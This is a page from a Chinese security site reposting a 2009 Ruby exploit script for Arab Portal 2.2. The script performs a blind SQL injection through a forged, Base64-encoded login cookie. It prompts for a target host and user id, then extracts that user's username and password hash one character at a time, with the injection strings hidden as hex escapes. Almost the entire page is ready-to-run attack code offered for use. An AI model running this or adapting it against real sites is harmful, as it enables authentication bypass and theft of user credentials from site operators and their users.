首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Arab Portal 2.2 (Auth Bypass) Blind SQL Injection Exploit
来源:www.scorpionds.com 作者:Jafer 发布时间:2009-08-10  

#!/usr/bin/ruby

#=============================================#
#          Arab Portal v2.2 Exploit           #,
# Blind SQL Injection / Authentication Bypass #
#  Discovered & written by: Jafer Al-Zidjali  #
#         Email: jafer@scorpionds.com         #
#         Website: www.scorpionds.com         #
#=============================================#

require "net/http"
require "base64"

intro=[
          "+=============================================+",
          "+          Arab Portal v2.2 Exploit           +",
          "+ Blind SQL Injection / Authentication Bypass +",
          "+  Discovered & written by: Jafer Al-Zidjali  +",
          "+         Email: jafer@scorpionds.com         +",
          "+         Website: www.scorpionds.com         +",
          "+=============================================+"
          ]

def print_intro text
  w="|"
  text.each do |str|
    str.scan(/./) do |c|
        STDOUT.flush
      if w=="|"
        print "\b"+c +w
        w="/"
      elsif w=="/"
        print "\b"+c +w
        w="-" 
      elsif w=="-"
        print "\b"+c +w
        w="\\"
      else
      print "\b"+c +w
      w="|"
      end
      sleep 0.05
    end
    print "\b "
    puts ""
  end
end

print_intro intro

puts "\nEnter host name (e.g. example.com):"
host=gets.chomp

puts "\nEnter script path (e.g. /arabportal/):"
path=gets.chomp

puts "\nEnter userid:"
userid=gets.chomp

puts "\nGetting cookie value..."

http = Net::HTTP.new(host, 80)

resp= http.get(path)
cookie = resp.response["set-cookie"]

len=cookie.split("; ").length
max=0
login_info=""

len.times do |count|
  clen=cookie.split("; ")[count].length
    if clen > max then
      max=clen
      login_info=cookie.split("; ")[count]
    end
end

login_info=login_info.split(", ")

if login_info[0].length > login_info[1].length
login_info=login_info[0]
else
login_info=login_info[1]
end

login_info=login_info.split("=")[0]

puts "Cookie name is: "+login_info

puts "\nWhat do you want to do?"
puts "1. Get username."
puts "2. Get password hash."

opt=gets.chomp

if opt=="1"
  unamelen=0
  print "\nGetting username length"

  20.times do |x|
    stmt="#{userid}"+
                    "\x27\x20\x61\x6e\x64\x20\x6c"+
                    "\x65\x6e\x67\x74\x68\x28\x75"+
                    "\x73\x65\x72\x6e\x61\x6d\x65"+
                    "\x29\x3d#{x}\x20\x6f\x72\x20\x27\x27\x3d\x27"

    shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
              "\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
              "\x72\x61\x62\x70\x6f\x72\x74\x61"+
              "\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
              "\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
              stmt.length.to_s+
              "\x3a\x22"+
              stmt+
              "\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
              "\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
              "\x31\x3a\x22\x61\x22\x3b\x7d"

    header={
                  "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
    }

    resp= http.get(path,header)
    if resp.body =~ /action=logout/
      puts "\nLength is: #{x}"
      unamelen=x
      break
    else
        print "."
        STDOUT.flush
    end
  end

  chars="abcdefghijklmnopqrstuvwxyz0123456789"

  print "\nGetting username: "
  unamelen.times do |z|
    chars.scan(/./) do |c|
        stmt="#{userid}"+
                        "\x27\x20\x61\x6e\x64\x20\x73"+
                        "\x75\x62\x73\x74\x72\x69\x6e"+
                        "\x67\x28\x75\x73\x65\x72\x6e"+
                        "\x61\x6d\x65\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27\x20\x6f\x72\x20\x27\x27\x3d\x27"

        shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
                  "\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
                  "\x72\x61\x62\x70\x6f\x72\x74\x61"+
                  "\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
                  "\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
                  stmt.length.to_s+
                  "\x3a\x22"+
                  stmt+
                  "\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
                  "\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
                  "\x31\x3a\x22\x61\x22\x3b\x7d"

        header={
                      "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
        }
        print c
        STDOUT.flush
        http = Net::HTTP.new(host, 80)
        resp= http.get(path,header)
        if resp.body =~ /action=logout/
          break
        end
        print "\b"
    end
  end
  puts "\nHave fun :)"

elsif opt=="2"
  chars="0123456789abcdef"

  print "\nGetting password hash: "
  32.times do |z|
    chars.scan(/./) do |c|
        stmt="#{userid}"+
                        "\x27\x20\x61\x6e\x64\x20\x73\x75"+
                        "\x62\x73\x74\x72\x69\x6e\x67\x28"+
                        "\x70\x61\x73\x73\x77\x6f\x72\x64"+
                        "\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27"+
                        "\x20\x6f\x72\x20\x27\x27\x3d\x27"
        shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
                  "\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
                  "\x72\x61\x62\x70\x6f\x72\x74\x61"+
                  "\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
                  "\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
                  stmt.length.to_s+
                  "\x3a\x22"+
                  stmt+
                  "\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
                  "\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
                  "\x31\x3a\x22\x61\x22\x3b\x7d"
        header={
                      "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
        }
        print c
        STDOUT.flush
        http = Net::HTTP.new(host, 80)
        resp= http.get(path,header)
        if resp.body =~ /action=logout/ 
          break
        end
        print "\b"
    end
  end
  puts "\nHave fun :)"
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FoxPlayer 1.1.0 (m3u File) Loc
·Joomla Component com_pms 2.0.4
·iRehearse (.m3u File) Local Bu
·Spiceworks 3.6 Accept Paramete
·MediaCoder 0.7.1.4488 (.lst &
·Mac OS X 10.5.7 (.CHM File) Lo
·The Huawei MT880 device suffer
·Pico MP3 Player version 1.0 cr
·ImTOO MPEG Encoder 3.1.53 (.cu
·Groovy Media Player 1.2.0 (.m3
·Playlistmaker 1.5 (.M3U/M3L Fi
·MS Internet Explorer 8.0.7100.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved